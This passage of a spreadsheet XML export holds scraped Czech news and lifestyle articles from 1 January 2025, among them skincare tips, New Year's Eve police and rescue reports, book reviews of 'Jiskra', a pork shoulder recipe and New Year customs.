    <t>Péče o pokožku, vlasy a vousy je v zimě nezbytná Zdeněk Bartoš Muži a ženy musí během zimy pečovat o pokožku Chladné počasí zasahuje každého z nás. Existuje několik základních kroků, které byste měli podniknout pro zdraví svého těla v zimním období. Není to vůbec těžké a nepotřebujete k tomu téměř žádné produkty. Díky tomu to zvládnou i muži, kteří na kosmetiku příliš nejsou a mají problémy ji pravidelně používat. Ochrana pleti před chladem Zimní měsíce přinášejí studené počasí a nízkou vlhkost, což může způsobit dehydrataci pleti. Muži by měli zahrnout výživné krémy do své každodenní rutiny. Používání hydratačních krémů s obsahem vitaminu E a kolagenu pomáhá udržet pokožku hydratovanou a chráněnou před vlivy chladného počasí. Mohlo by vás zajímat: Zimní měsíce jsou pro orchideje náročné. Škodí jim přetopený byt i mrazivý průvan Správná péče o vousy Vousy potřebují zvláštní pozornost v zimních měsících. Mráz a vítr mohou způsobit vysušení a lámání vousů. Muži by měli používat kvalitní oleje nebo balzámy pro vousy, aby udrželi optimální vlhkost a zabránili třepení. Pravidelné stříhání konečků vousů a používání hřebenů či kartáčů pomáhá udržet vzhled vousů v perfektním stavu. Zdroj obrázku: Freepik Prevence proti suchým rukám Chladné počasí může negativně ovlivnit i ruce, které jsou často vystaveny chladu a větru. Muži by měli používat kvalitní hydratační krémy na ruce s obsahem vitaminu E. Nesmíte zapomínat ani na pravidelné nošení rukavic, které pokožku hodně ochrání. Pravidelná péče o ruce přispívá k udržení měkkosti a pružnosti pokožky. To je důležité hlavně v případě, že děláte manuální práci venku. Mohlo by vás zajímat: Prášky na spaní jsou zbytečné. Problémům se spánkem udělá konec oblíbené ovoce Dodržování zdravé stravy a pitného režimu Zimní období vyžaduje i vnitřní péči o pleť a vlasy. Muži by měli dbát na vyváženou stravu bohatou na vitamíny A, C a E, které podporují zdravou pokožku a vlasy. Dostatečný pitný režim je klíčový pro hydrataci celého těla, což se projeví i na kvalitě pleti a vlasů. Omezte konzumaci alkoholu a kofeinu a raději je vyměňte za čaj a vodu. Zdroj: https://www.kiehls.com/skincare-advice/mens-winter-skin-tips.html Autor: Zdeněk Bartoš Autor person Zdeněk Bartoš Rubrika transition_slide Rady a návody</t>
  </si>
  <si>
    <t>218</t>
  </si>
  <si>
    <t>20250101_153_3696056409_f52fd89b42a5ac27df47.html</t>
  </si>
  <si>
    <t>f52fd89b42a5ac27df47</t>
  </si>
  <si>
    <t>Silvestr ve Zlíně: Ztracení psi, agresivní soused i poctivý taxikář</t>
  </si>
  <si>
    <t>Silvestr ve Zlíně : Ztracení psi, agresivní soused i poctivý taxikář Krátce před polednem spadl starší muž při vystupování z trolejbusu. Na pomoc mu přijeli strážníci městské policie. Zraněný 70letý senior se vzhledem ke svému věku a zdravotním omezením nedokázal vlastními silami postavit. Hlídka mu tak nejen pomohla zpět na nohy, ale s ohledem na snížené pohybové schopnosti seniora jej dopravila do místa bydliště, kde ho předala rodinnému příslušníkovi. „Do stanice hasičů v místní části Prštné se schoval kolem čtvrt na pět odpoledne pes – kříženec, který se zaběhl svému majiteli,“ popsal další zásah mluvčí zlínské městské policie Pavel Janík. Protože se nepodařilo zjistit totožnost majitele, převezli ho strážníci do zlínského útulku pro zvířata v nouzi. Ve stejném zařízení pak skončil také druhý pes – jezevčík, který byl odchycen o několik desítek minut později v lokalitě Podhoří. Kolem půl deváté na služebnu městské policie přišel řidič taxislužby, který nalezl ve svém autě mobilní telefon. Ten vypadl zákazníkovi, kterého předtím vezl do místní části Kudlov. Řidič neznal jeho totožnost a telefon byl zaheslovaný, takže z něj nemohl zjistit údaje o majiteli. Zlínsko „Strážníci mobil převzali a čekali. Na Nový rok přijali hovor od bratra majitele, kterého seznámili s nastalou událostí. Hodinu před novoročním obědem si tak mohl majitel svůj telefonní přístroj opět vyzvednout,“ popsal Janík. Příchod roku 2025 oslavily na náměstí Míru přibližně čtyři desítky osob a vše proběhlo v relativním poklidu a bez narušení veřejného pořádku. O hodinu a půl později dvojice mladíků ve věku 17 a 18 se rozhodla vyřídit účty s přenosnými dopravními značkami, které postávaly ve směru jejich chůze. Jeden z nich tak odnesl a posléze opodál odhodil směrovací desku, druhý pak odstranil přenosnou dopravní značku zákaz vjezdu. Po domluvě strážníků mladíci značení vrátili zpět na své místo. Domluva byla naopak vyloučena u případu 50letého muže, který měl z obtížně pochopitelného důvodu napadnout svoji sousedku. Ta se čtvrthodinu po druhé hodině ranní obrátila na tísňovou linku 156. Strážníci zjistili, že se 39letá žena potkala s dotyčným na domovní chodbě. Vzájemně pozdravili, načež žena zašla do svého bytu. „Když ale po chvíli uslyšela divný zvuk, podívala se dveřním kukátkem a spatřila svého souseda s fixou v ruce, jak něco píše na vstupní dveře jejího bytu. Když je pak náhle otevřela, soused se snažil poněkud neohrabaně zmizet, ale při následné konfrontaci ji měl neurvale uchopit a držet za ruce,“ popsal mluvčí strážníků. play_fill Krimi Napadená žena stěžovala na bolest rukou, proto byla na místo přivolána zdravotnická záchranné služba a také policie, která si věc převzala k dalšímu šetření. „Zbývá tak jen pro úplnost podotknout, že žena byla prakticky střízlivá, zatímco její soused měl v dech přibližně 2 promile alkoholu ,“ uzavřel silvestrovské zásahy Pavel Janík. Autor: Iva Nedavašková Autor person Iva Nedavašková</t>
  </si>
  <si>
    <t>16280.000000000002</t>
  </si>
  <si>
    <t>20250101_154_3696030193_d203ca96c1231ad5a894.html</t>
  </si>
  <si>
    <t>d203ca96c1231ad5a894</t>
  </si>
  <si>
    <t>Nechtěl čekat, až popeláři udělají svoji práci. Objel je po chodníku</t>
  </si>
  <si>
    <t>Nechtěl čekat, až popeláři udělají svoji práci. Objel je po chodníku vložil Policie ČR jméno Policie ČR autor textu Dita Holečková zdroj textu tisková zpráva autor fotografií Policie ČR hash tag alkoholzavolantem 01.01.2025 13:51 krimi Zobrazeno 1190x Když policisté z oddělení silničního dohledu projížděli ulicí Železničního pluku, museli zpomalit a nakonec úplně zastavit. V ulici v tu chvíli popeláři sváželi odpad. Řidič dodávky, který stál přímo před policejním vozidlem v civilním provedení, ale asi neměl dostatek trpělivosti. Nebo prostě nechtěl čekat a aktuální neprůjezdnost ulice vyřešil po svém. Vjel na chodník, po kterém několik desítek metrů pokračoval v jízdě, až do chvíle, kdy bylo možné zase sjet zpět na silnici. Policisté ho dojeli, zastavili a provedli s ním silniční kontrolu. Samotná jízda po chodníku by řidiče stále maximálně pokutu 1.500 korun. Když ale přístroj na měření alkoholu v dechu ukázal u šestačtyřicetiletého řidiče hodnotu 0,44 promile, u pokuty to neskončilo. Až na 18 měsíců může přijít o řidičský průkaz. Policisté muži na místě zakázali další jízdu a celou událost oznámili příslušnému správnímu orgánu. Zajímavé zprávy z regionu Autor: Orlický.net</t>
  </si>
  <si>
    <t>1130</t>
  </si>
  <si>
    <t>20250101_155_4082022067_67dcd93030cd4304dbba.html</t>
  </si>
  <si>
    <t>67dcd93030cd4304dbba</t>
  </si>
  <si>
    <t>Jiskra - Monika Rutka</t>
  </si>
  <si>
    <t>Jiskra - Monika Rutka Hodnocení a recenze čtenářů Nápověda 4.0 z 5 17 hodnocení čtenářů 6× 5 hvězdiček 5× 4 hvězdičky 6× 3 hvězdičky 0× 2 hvězdičky 0× 1 hvezdička Přidejte své hodnocení produktu Nic moc 1 2 3 4 Perfektní 5 knizni_rajdy registrovaný uživatel 4 z 5 hvězdiček Přiznám se, že do čtení Jiskry jsem šla tak jak to mám nejraději - tudíž jsem absolutně netušila, co mě čeká. Mladá Američanka Lizzie letí studovat do Anglie . Obává se hostitelské rodiny, ale ta ji přijme, jako by byla jejich vlastní, až na jejich syna Chase, který je nepřátelský a drží si odstup. Po tomhle úvodu jsem čekala, že se dvojice postupně sblíží, zamiluje, přijdou komplikace, nakonec smíření a happy end. Jenže Lizzie není křehká květinka čekající na lásku. Lizzie má hodně temných tajemství a snaží se pouze jít dál a nezbláznit se. Takže čtete dál a dál a čekáte na TU lásku a kdy to celé bouchne.. A ono to přijde! Jenže ne tak, jak jste čekali.. Potřebuji další díl! Prosím, přeložte to někdo! Když se do knihy pustíte, tak vás čeká akce, krásná přátelství, očekávaná láska, tajemství, pevné rodinné vazby, životní rozhodnutí a zlo číhající za rohem.. Moc děkuji @knihydobrovsky, že jsem se mohla stát ambasadorkou této knihy. Přečíst více Pomohla vám tato recenze? Ano 1 Kniha, Red, 2025, 9788027722792 Luc_boox registrovaný uživatel 5 z 5 hvězdiček Zakoupil produkt Hodnoceno z aplikace 1. díl ze série Řetěz z @nasenakladatelstvi GR: 4.21 / DK: 81% / CBDB: 92% 22 kapitol - přibližně 24 stran na 1 kapitolu Za možnost stát se #knizniambasador moc děkuji @knihydobrovsky a @kate_valter #spoluprace Než jsem se do knihy pustila, tak jsem znala pouze vysoké hodnocení na GR, to, že je autorka Polka a na DK byla kniha zařazena do ženských románů. Automaticky jsem předpokládala, že se jedná o eroťárnu a i prolog knihy mě v tom nechal. Jak jsem byla překvapená, že tu máme děj z prostředí školy a velkou část knihy bych řekla, že se jedná o young adult. Objeví se tu ale sex, takže nevím, jestli to stále lze považovat za YA...ale třeba pro sedmnáctileté, proč ne. Ale víte co? Já ten příběh naprosto žeru. Během čtení jsem si říkala, že to má vibe příběhů, které jsem kdysi četla na Wattpadu. A on ten příběh skutečně byl nejdřív psán na této platformě. Četlo se mi to fakt lehce a na to, že má kniha fakt dlouhé kapitoly, což často způsobuje, že se u knihy začnu nudit a vyhlížím konec, tak tady se nic takové nedělo. Děj fakt odsýpal a já potřebovala vědět, co se stane dál. Za mě je to hodně slowburn, takže jsem neustále vyhlížela, kdy si konečně aspoň dají pusu, protože to mezi postavami fakt jiskřilo. K tomu tu navíc máme i záhadu v podobě dopisů a fotek, které hlavní postavě Lizzie chodí. A jestli si myslíte, že na konci příběhu získáte odpovědi, tak to rozhodně ne. Konec knihy vám zamotá hlavu ještě víc, vůbec nechápete co se stalo, jak to máte chápat a potřebujete nutně druhý díl. Co mě teda zarazilo, že se v knize hodně kouřilo. Jakože je mi to jedno, ale snad si nepamatuji knihu, kde by toto bylo zmíněné, spíš bych řekla, že v 99% knih se nekouří… Přečíst více Pomohla vám tato recenze? Ano 0 Kniha, Red, 2025, 9788027722792 Bubi_knihomolka registrovaný uživatel 3 z 5 hvězdiček Kdo miluje knižní ořízky? Tato bude skvělá. A zároveň tato kniha skrývá - napětí, záhady minulosti, YA romantiku, Hate to love. Rozhodně by vás tedy neměla kniha minout. A hlavně i kvůli sympatickému Chaseovi, který je pohledný, citlivý a starostlivý. No a jejich vznikající vztah a odkrývání minulosti? To už si budete muset přečíst…. Přečíst více Pomohla vám tato recenze? Ano 0 Kniha, Red, 2025, 9788027722792 Sangsterwriter registrovaný uživatel 4 z 5 hvězdiček Hodnoceno z aplikace Nejdřív chci pochválit obálku knížky, která je nádherná i z barevné kompozice. Dokonce bude mít krásnou i ořízku, což vypadá také úžasně. Knížka je taková bichlička, takže nečekejte rychlé čtení. Kupodivu se to četlo hezky, že jsem se nikde nezadrhávala. Autorka uměla i dobře vykreslit okolní svět. Jen některé pasáže byly zdlouhavé a zbytečné pro děj. Po dlouhé době jsem objevila knížku, která mě překvapila a zmátla. Podle anotace jsem čekala úplně něco jiného, než se to samo vyvrbilo. Příběh vás vezme do různých dramat, alkoholu , rvaček, kouření a temné minulosti. Každá postava schovává za temnou oponou, kterou postupně odkrýváte. Jen mi to přišlo trošku už překombinované. Postavy svoje problémy řešili alkoholem , aby se nerozpadly a drželi pohromadě. Přišlo mi, že autorka to až moc překombinovala ohledně problémů. Najdete tu hromadu klišé scén, které mi buď vadili nebo rozesmáli. Romantika mezi postavami mě bavila. Tu autorka napsala dokonale, protože jsem postavám fandila a užívala si jejich chemii. Konec knihy vás láká na otevřený konec, takže se očekává další díl. Stále jsem na vážkách, jestli budu chtít číst dál. Shrnutí: Knížka není špatná, jen řeší dost témat, které se pak motají dohoromady. Když pominu pár negativ, tak se mi knížka líbila. Přečíst více Pomohla vám tato recenze? Ano 0 Kniha, Red, 2025, 9788027722792 Adéla Ňorková (adule.books) registrovaný uživatel 4 z 5 hvězdiček Polská autorka, která mě svou knihou naprosto vyvedla z omylu a šokovala zároveň. Když jsem začínala číst, myslela jsem si, že to bude romantika každým coulem, že mě asi nic nepřekvapí. No, hodně jsem se spletla Rozhodně tu nečekejte sladkou romantiku s růžovými obláčky, ale ani žádnou dark romanci. Příběh v sobě ukrývá mnohem víc. Elizabeth neboli Eliza, Lizzy či Parkerová, jak ji v knize oslovují přijíždí do Anglie do přímořského městečka jménem Crosby. Ubytuje se u hostující rodiny, která je na první pohled opravdu skvělá. Až na jednoho člena rodiny, který ji od samého začátku nemá rád. Chase. Naproti tomu jeho sestra Caroline si s Lizzy hodně padne do noty i Josephine a Jonathan se jeví jako skvělí. Velmi rychle si zde Lizzy najde přátele. Což mě docela překvapilo. Ale asi to má v povaze. Lizzy se totiž s ničím nemaže, umí zasadit dobrou ránu, jak pěstí tak i slovní. Zastává se slabších. Ale sama má své démony, před kterými utíká. Zdají se jí divné sny a taky ji někdo našeptává, že se smrtí její matky to není, tak jak jí otec celou dobu tvrdí. Jedna neřest střídá druhou alkohol a cigarety těch je tu opravdu požehnaně. Není snad kapitola, ve které by si někdo nevytáhl cigaretu nebo si nedal panáka. Což mě docela udivuje a vlastně mi to maličko vadilo. Proč toho musí být plná kniha? Její spřízněná duše je její nevlastní bratr Aiden, se kterým toho spoustu zažila, nicméně jejich konverzace je prostě svá. Víc k tomu asi neřeknu. Pak je tu Chase, kterého si určitě na první dobrou zamilujete, ačkoliv se zpočátku jeví jako osina v zadku. Slovní přestřelky mezi ním a Lizzy jsou nezapomenutelné. Vyloženě to mezi nimi jiskří. Ovšem jeho nálady se střídají, jak kdyby měl PMS. Vážně. Jednou něžný a starostlivý Chase a podruhé někdo úplně jiný. Lizzy se během svého pobytu dostává nejednou do úzkých. Celou knihu prostupují texty psané kurzívou, které jsou adresované Chaseovi. “Škoda jen, že jsem ty myšlenky neuvedla do praxe. Škoda, že jsem ve snaze o ochranu před popálením spálila všechno kolem. Byla jsem slepá. Přehlédla jsem tu jednu maličkou jiskru. “ Kniha je plná tajemství, lží, mejdanů, rodiny či kamarádství. Najdete tu taky nějaké spicy scény. Kapitoly jsou docela dlouhé, příběh hezky plyne a kupodivu jsem se ani jednou nenudila. Je tu hodně postav, různých propojení takže mi to trošku trvalo, než si to sedlo. Konec knihy jsem musela číst vícekrát, abych pochopila co se vlastně stalo. A jako woow! Tohle prostě nevymyslíš! Taková pecka na závěr, proč? Kdy bude další díl. Hodnocení: 4,5* Přečíst více Pomohla vám tato recenze? Ano 0 Kniha, Red, 2025, 9788027722792 Získejte přehled o vývoji ceny za posledních 60 dní. Maloobchodní cena Minimální prodejní cena: 359 Kč Nápověda Budeme vám posílat jen samé dobré zprávy! Tipy na knížky, akce a výhodné nabídky. Chcete? Váš @ e-mail Autor: KnihyDobrovsky.cz</t>
  </si>
  <si>
    <t>67660</t>
  </si>
  <si>
    <t>72490</t>
  </si>
  <si>
    <t>20250101_156_3695999172_0fa1dca9f3d8719a041a.html</t>
  </si>
  <si>
    <t>0fa1dca9f3d8719a041a</t>
  </si>
  <si>
    <t>Znáte ho? Naše babičky ho milovaly: Levné a šťavnaté maso, které se perfektně hodí na rodinné večeře</t>
  </si>
  <si>
    <t>Znáte ho? Naše babičky ho milovaly: Levné a šťavnaté maso, které se perfektně hodí na rodinné večeře babičky, doma, domácnosti, domov, kuchyně, levně, maso, radíme, rady, tipy, triky, trouba I levné maso může chutnat skvěle. Když přijde řeč na úspory, mají naše babičky jasno. Před nákupem si sepíšou přesný seznam toho, co mají koupit, a z těchto surovin pak uvaří skvělou rodinnou večeři. Spousta peněz se pak dá ušetřit právě na mase. Jen musíte vědět, jaký druh máte koupit. Ceny masa se odvíjejí od jeho dostupnosti. Tady tedy rozhoduje hlavně sezóna. Před Velikonocemi seženete levné skopové, na podzim zase zvěřinu a přes zimu hlavně ryby. K těm nejlevnějším kouskům masa patří vepřové hlavy, kolena a také vnitřnosti. Z plíček, jater nebo srdíček naše babičky vařily skvělé omáčky. Ovšem ten nejlepší kus masa seženete levně v jakémkoliv supermarketu nebo masně. Nestojí moc a zároveň z něj připravíte úžasné pokrmy, které nasytí celou rodinu. Má ideální poměr tuku a libového masa Z vepřového masa vykouzlíte hned několik skvělých jídel. Mezi nejjemnější část patří panenka. Využít se dá ale i ocásek, který lze rozseknout na dva díly a péct v troubě. Výborný je pak třeba k pivu jako předkrm. Ořezy z vepřového se dají použít na domácí mletou sekanou a mohou se také zavařit na později. Známá je také krkovice, kterou mají v oblibě zejména pánové. Najdete ji za krkem prasete a pokračuje až k zadním žebrům. Nejlépe uděláte, když krkovici upečete vcelku s pikantní nádivkou. Čerstvé maso poznáte podle svěží vůně a přirozené barvy Foto Shutterstock Babičky by ale k běžnému vaření doporučily vepřovou plec. Jedná se o levné a zároveň šťavnaté maso, které se dá naporcovat i na menší díly. Ples je naprosto vyvážené maso s ideálním poměrem tuku a libového masa. Právě díky obsaženému tuku není třeba plec prudce opékat. I tak zůstane pěkně šťavnaté. Navíc jej stačí pouze lehce okmínovat, opepřit a osolit. Nepotřebuje žádné speciální marinády ani koření. Jak poznáte, že je maso čerstvé? Čerstvé vepřové maso poznáte podle toho, že má jemně růžovou barvu s jemnými vlákny a lehce mramorovaným tukem. Plec je nejchutnější co nejdřív po porážce, v lednici ale bez obav vydrží i několik dní. Oproti krkovici potřebuje delší tepelnou úpravu. Při pečení se však plec nijak nevysušuje a dá se snadno připravit i díky pomalému stylu vaření (v pomalém hrnci). Babička by vám jistě doporučila z plece ten nejzákladnější recept – bratislavskou plec. Jedná se o dušené maso z vepřové plece doplněné o jemnou smetanovou omáčku. Jako příloha je nejlepší knedlík, podávat se ale může i s těstovinami. Uvaříte mrkev a celer doměkka a poté je nakrájíte na jemné kostičky. Jednu větší cibuli osmahnete na oleji dozlatova, přidáte osolené kousky masa, orestujete a opatrně do hrnce vlijete rajčatový protlak. Podlijete vodou či vývarem a dusíte do té doby, dokud maso zcela nezměkne. Poté vyndáte a šťávu zahustíte moukou rozmíchanou ve vodě. Přidáte pár kapek citronu, mléko a jemnou smetanu. Hrnec stáhnete z plotny a do scezené omáčky vmícháte trochu sterilovaného hrášku a povařenou zeleninu. Tento československý recept rodiny našich babiček vždy milovaly. Vepřová plec je vynikající v receptu na bratislavskou pečeni Foto Shutterstock Vynikající a univerzální maso Vepřová plec je ideální pro širokou škálu receptů od pečeně až po guláš. Připravit ho zvládne i totální kuchařský začátečník. Jen málokterá surovina má v kuchyni tak rozsáhlý záběr. Hotové upečené plecko by mělo mít ideální teplotu 79–85 °C a může se také udit. Ovšem po vyuzení bývá toto maso poněkud tužší. Když se však dobře prosolí a vyudí v podobě rolády, je pak vynikající jako chuťovka k různému druhu pečiva a zelenině. Plec je zkrátka ideální volbou pro každého, kdo hledá cenově dostupný a zároveň chutný a šťavnatý kus masa. Lze jej péct, dusit, grilovat i udit. Při výběru masa volte vždy kusy s rovnoměrně rozloženou vrstvou tuku. Pro snadnější přípravu plec nakrájejte na menší kostky, které posléze můžete bez problému i zamrazit. Zdroje: toprecepty.cz, apetitonline.cz Autor: Karol Michalíková Autor person Karol Michalíková</t>
  </si>
  <si>
    <t>20250101_157_3696004002_7c64c100a64e4ee83ea0.html</t>
  </si>
  <si>
    <t>7c64c100a64e4ee83ea0</t>
  </si>
  <si>
    <t>Nový rok</t>
  </si>
  <si>
    <t>Nový rok 1. 1. 2025 Zdroj fotografie: Rádio Blaník Ze včerejška na dnešek bujaré oslavy, při kterých určitě padla minimálně jedna láhev. A co dnes? Kocovinka, kocovinka? Mezitím, než najdete česnek na vyprošťovací polévku nebo vychlazené pivo , protože co vás zkazilo, to vás i napraví, podíváme se na novoroční tradice a zvyky. Víte, co se vám dnes zdálo? Prý by se vám to mohlo splnit. Teď si vezměte do ruky zvoneček a hybaj obcházet chalupu! Podle tradice bychom totiž měli projít všechny místnosti a cinkat, za což vám ten, kdo leží s bolavou hlavou, určitě poděkuje. Takže si tak cinkáte a cinkáte, a pokud zvuk zvonečku bude na nějakých místech znít divně, cinkejte tak dlouho, dokud neuslyšíte opět pěkný zvuk. Tím prý odeženete zlé síly. Pořekadlo „Jak na Nový rok, tak po celý rok“ známe všichni, ale pozor! V těchto dnech byste rozhodně neměli uklízet. Pokud budete zametat, vymetete si štěstí z domu. Zákaz uklízení však neznamená lenošení, protože i to prý přináší smůlu. Na Nový rok byste také měli mít na sobě něco nového. A nezapomeňte na čočku – ta prý zajistí hodně peněz. Proto ji raději uvařte rovnou tři až čtyři hrnce. Měla by se také péct vánočka. Do té schovejte hrášek – kdo ho najde, bude mít velké štěstí. Bílá ovarová polévka s kroupami je zase pro zdraví, a někde se dělávalo i selátko, které také přinášelo štěstí. Co naopak nejíst? Podle tradice se říká, že byste se měli vyhnout čemukoliv, co má křídla, aby vám štěstí neuletělo, nebo rybám, aby vám štěstí neuplavalo. Svět podle Samiry si můžete zpětně kdykoliv poslechnout v podcastech Rádia BLANÍK Autor článku: Rádia Blaník si cením za propagaci českých umělců a umělkyň. A svými články na webu chci podpořit nejen tyto naše hodnoty. Nejnovější články Autor: Adéla Zahradníčková Autor person Adéla Zahradníčková</t>
  </si>
  <si>
    <t>4560</t>
  </si>
  <si>
    <t>5330</t>
  </si>
  <si>
    <t>20250101_158_3696311715_4ea6050561a615ff6532.html</t>
  </si>
  <si>
    <t>4ea6050561a615ff6532</t>
  </si>
  <si>
    <t>Silvestr pohledem záchranných složek</t>
  </si>
  <si>
    <t>Silvestr pohledem záchranných složek Pojďte se společně s námi podívat, co vše musely záchranné složky v noci na dnešek řešit v západních Čechách Autor: Petr Novák středa 1. ledna 13:16, aktualizace 14:41 Hasiči Záchranáři Policie Alkohol Krádež Napadení Vloupání Partner článku – Autocentrum Jan Šmucler Oslavy Nového roku proběhly v celých západních Čechách v podstatě bez závažnějších událostí, záchranné složky ale samozřejmě měly napilno více, než obvykle. V Plzeňském kraji hasiči vyjížděli převážně k hašení obalů od pyrotechniky a kontejnerů a podobně tomu bylo i v Karlovarském kraji . "Od půlnoci do sedmi hodin ráno jsme zasahovali u devatenácti událostí. Ve třinácti případech se jednalo o požáry, kdy hořely zbytky po použité zábavní pyrotechnice či odpad v kontejnerech. Při těchto požárech se nikdo nezranil," uvedl nám mluvčí hasičů. Záchranáři řešili hlavně úrazy spojené s přehnanou konzumací alkoholu a pyrotechnikou. "Letošní silvestrovské oslavy proběhly pro naše záchranáře klidněji než v předchozích letech. Výjezdy, které byly spojené s vítáním nového roku, nebyly tak závažné a jejich počet čítal kolem dvaceti. Úrazy způsobené pyrotechnikou jsme zaznamenaly pouze dva a to lehčího charakteru. Další události, typu úrazy v opilosti či napadení, se pohybovaly v jednotkách a za asistence Policie ČR," popsala mluvčí plzeňských záchranářů. Před jednou hodinou ráno museli strážníci městské policie řešit bezohledného řidiče, který na náměstí Republiky u Prešovské ulice zaparkoval svůj vůz na koleje a odešel, čímž zablokoval tramvajovou dopravu. Na místo musel být povolán odtahový vůz, kterým byl vůz naložen a odtažen, takže doprava byla v krátkém čase obnovena. My jsme zaznamenali jeden případ poranění pyrotechnikou, ke kterému došlo po půlnoci na náměstí Republiky v Plzni . Zde byla výbuchem pyrotechniky zasažena jedna ze stánkařek, které exploze propálila bundu na zádech. Vzhledem k pokročilejšímu těhotenství si ženu do péče převzali záchranáři a k dalšímu vyšetření ji transportovali do Fakultní nemocnice Lochotín. "Silvestrovský večer je pro ZZS KVK náročnější oproti běžné noční službě. Evidujeme nárůst výjezdů i volání na tísňovou linku 155 asi o 20%. ZZSKVK posílila na operačním středisku o jednu operátorku a na výjezdových základnách v Sokolově a Karlových Varech došlo k posílení o jednu posádku RZP se záchranářem. Mezi nejčastější události patřily úrazy, napadení, pády, intoxikace, poruchy vědomí a nevolnosti. Evidujeme dvě poranění po zásahu petardou do obličeje, jedno v Toužimi , kde byl dvacetiletý muž s vážnými zraněními transportován do Fakultní nemocnice Praha Vinohrady na popáleninovou kliniku. Druhý případ se odehrál v Chebu , kde byl čtyřicetiletý pacient ošetřen a následně transportován na oční ambulanci nemocnice Sokolov ," doplnil mluvčí karlovarských záchranářů. Policisté v Plzeňském kraji podle tiskové mluvčí nezaznamenali v průběhu noci žádnou vážnější dopravní nehodu ani mimořádnou událost, řešili ale množství oznámení, která se týkala zejména případů osob pod vlivem alkoholu a také několik rvaček a napadení. Po půlnoci museli policisté na náměstí Republiky v Plzni řešit muže, který pyrotechnikou ohrožoval kolemjdoucí. Protože muž odmítal uposlechnout zákonných výzev a byl agresivní, museli ho policisté zpacifikovat pomocí donucovacích prostředků, načež byl zajištěn a převezen na obvodní oddělení policie k dalším úkonům. Stejně dopadl i jeho kamarád, který v průběhu zákroku policisty napadl. Následoval případ napadení muže, kterého také na náměstí zatím neznámý útočník několikrát udeřil pěstí a způsobil mu zranění v obličeji, které si vyžádalo transport do nemocnice. Po druhé hodině ráno pak policisté vyjížděli do Kopeckého sadů v Plzni na oznámení o napadení dvou mladých mužů. Ukázalo se, že oba přibližně pětadvacetiletí muži byli v klubu krátce po sobě napadeni dívkou. Prvního z mužů napadla na toaletách pěstmi a takzvanou hlavičkou, načež o chvíli později před klubem jeho kamaráda asi desetkrát udeřila pěstí do obličeje. Oba muži z místa utekli a přivolali si pomoc, jeden z nich totiž v obličeji utržil zranění, které si vyžádalo jeho transport do Fakultní nemocnice Lochotín. Během noci nechyběla ani běžná majetková trestná činnost, například v Tachovské ulici v Plzni došlo k vloupání do večerky. Pachatel násilím vnikl dovnitř, nabral si pár lahví alkoholu a z místa unikl ještě před příjezdem strážných, kteří dorazili asi do dvou minut po vyhlášení poplachu na PCO. Největší škoda tak vznikla na dveřích a mřížích. "V průběhu posledního dne roku 2024 a následné silvestrovské noci, v době od 31. prosince od sedmi hodin ráno do 1. ledna 2025 do sedmi hodin ráno policisté na Integrovaném operačním středisku Krajského ředitelství policie Karlovarského kraje přijali 237 oznámení na lince tísňového volání. Ve srovnání s posledními silvestrovskými oslavami bylo přijato ve stejném časovém období o pouhých devět oznámení více. Od půlnoci 1. ledna 2025 do sedmi hodin ráno, tedy v době, kdy vypukly silvestrovské oslavy naplno, bylo přijato rovných 100 oznámení z celkových 237. Policisté během silvestrovských oslav vyjížděli nejčastěji k domácím sporům, rušení nočního klidu a drobným šarvátkám. V několika případech také asistovali kolegům z Hasičského záchranného sboru," popsal tiskový mluvčí policie. Silvestrovské kuriozity Tradičně bylo během silvestrovských oslav, které u některých začaly již v dopoledních hodinách, přijato několik nevšedních oznámení. Krátce po desáté hodině dopoledne oznámila žena z Karlových Varů , že jí přišel navštívit její čtyřicetiletý syn, který jí během návštěvy začal vykrádat lednici. Během hovoru ale svého jednání zanechal a z bytu odešel s prázdnou. Krátce po poledni odeslala žena z Karlových Varů tísňovou SMS zprávu, ve které žádala, aby policisté z Integrovaného operačního střediska vyrozuměli Semira Gerkhana, známou postavu policisty z německého akčního kriminálního televizního seriálu, aby se vydal na pomoc svým kolegům, kteří jsou v nebezpečí. V Mariánských Lázních se při prohlídce kolonády ztratila německá turistka, která ovšem ještě během hovoru na tísňovou linku přišla zpět k zájezdovému autobusu. Po deváté hodině večer se přišel policistům z obvodního oddělení Ostrov vyzpovídat jeden z místních obyvatel, který následně požadoval kontakt na faráře. Policisté u muže provedli orientační dechovou zkoušku, která vyšla s pozitivním výsledkem 3,1 promile. Po chvíli byl muži předán kontakt na místního faráře a ten odešel domů spát. Autor: Petr Novák Autor person Petr Novák</t>
  </si>
  <si>
    <t>57250</t>
  </si>
  <si>
    <t>20250101_159_3695958125_0925888bd3b2615ef9cc.html</t>
  </si>
  <si>
    <t>0925888bd3b2615ef9cc</t>
  </si>
  <si>
    <t>Co se stane s vaším tělem, když přestanete pít alkohol: Fyzické i psychické změny krok za krokem</t>
  </si>
  <si>
    <t>Co se stane s vaším tělem, když přestanete pít alkohol : Fyzické i psychické změny krok za krokem 3 min. 1. 1. 2025 Pití alkoholu je v naší společnosti stále vnímáno jako norma a zvláštní je spíš to, když člověk nepije. I tak se ale najde dost lidí, kteří s pitím buď přestali úplně, nebo alkohol ve svých životech alespoň výrazně omezili. Co se při jeho absenci začne dít v lidském těle? REKLAMA Mocktaily a střízlivá zvědavost Slyšeli jste o mocktailu? Ne, nejde o nový silný mix tvrdého alkoholu , právě naopak. Mocktail je mix nealkoholických nápojů dle výběru. Po celém světě se tak objevují nové termíny nebo metody toho, jak pití alkoholu omezit, případně ho zcela opustit. Kampaň Suchý únor je i u nás asi neznámější, tedy výzva vzdát se jakéhokoli alkoholu na celý měsíc. V posledních letech ale rozhodnutí vyhnout se příšerným kocovinám neskončilo jen u novoročních předsevzetí. Týká se to hlavně mladších ročníků. Nárůst abstinence Během posledních dvou dekád se množství studentů před maturitou hlásicích kompletní abstinenci zvedlo jen v USA o 8 %. V Británii pak celých 26 % mladých ve věku 16-24 let uvedlo, že nikdy nepijí. Důvodů pro odřeknutí si alkoholu je vícero. Pro někoho jsou to kalorie a nadváha, pro další riziko poškození jater, vyššího krevního tlaku nebo potenciálu pro rakovinu. Co se ale vlastně děje v organismu, když si průměrný konzument alkoholu řekne, že s pitím opravdu končí? Nenechte si ujít: Pobřežní hlídka se vrací na obrazovky. Erika Eleniak se po pětatřiceti letech už v plavkách raději neukazuje Definujme konzumenta Ano, první problém nastává s definicí průměrného konzumenta či pijáka. DCD (Centre for Disease Contol and Prevention) popisuje přiměřené pití jako jeden nápoj denně pro ženu a dva pro muže. Dvě třetiny dospělých konzumentů ale dle studie uvádí, že minimálně jednou za měsíc tento objem překonají. Pak je tu ještě nárazové pití neboli „binge drinking“. To spočívá v konzumaci minimálně 4 drinků během 2-3 hodin sezení v hospodě 